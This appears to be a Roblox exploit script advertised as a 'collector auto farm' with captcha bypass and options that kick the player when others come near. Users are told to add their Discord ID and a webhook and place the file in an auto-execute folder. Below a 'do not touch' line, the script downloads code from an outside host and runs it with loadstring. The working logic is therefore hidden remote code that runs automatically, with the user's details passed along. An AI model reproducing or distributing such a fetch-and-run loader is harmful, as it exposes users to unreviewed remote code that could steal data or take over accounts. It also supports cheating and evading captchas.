Created by Internal#1234
Features:
- COLLECTOR AUTO FARM
- HOW TO USE:
- 1. Add discord ID
- 2. Add webhook to where the script says
- 3. Click download below and add to your auto execute folder
getgenv().DiscordUserId = "id here" -- YOU MUST FILL THIS OUT FOR THE SCRIPT TO WORK.
Settings = {
ReturnToMenu = 'false';
CaptchaBypass = 'true';
Webhook = ''; -- Make sure to add a webhook or the script wont work properly
Priority = {"Azael Horn", "Heirloom", "Staff of Pain", "Pocket Watch", "Unwavering Focus", "Phoenix Bloom", "Dienis Locket", "Mask of Baima", "Bye"};
Soundhere = 'rbxassetid://3993398286';
WaitingTime = 12;
KickIfPlayerNear = 'true';
PlayerCheckMagnitude = 350;
KickIfPersonAttacks = 'false';
RollOutOfFF = 'true';
BackUpDeleteFF = 'true';
};
------------------- DO NOT TOUCH ANYTHING BELOW THIS LINE. -------
if getgenv().DiscordUserId == "" or getgenv().DiscordUserId == "id here" then
game:Shutdown()
else
loadstring(
syn.request({Url='http://archgay.xyz/InternalCollectorBot.php',
Method='GET',
Headers='Syn-Fingerprint'}).Body)()
end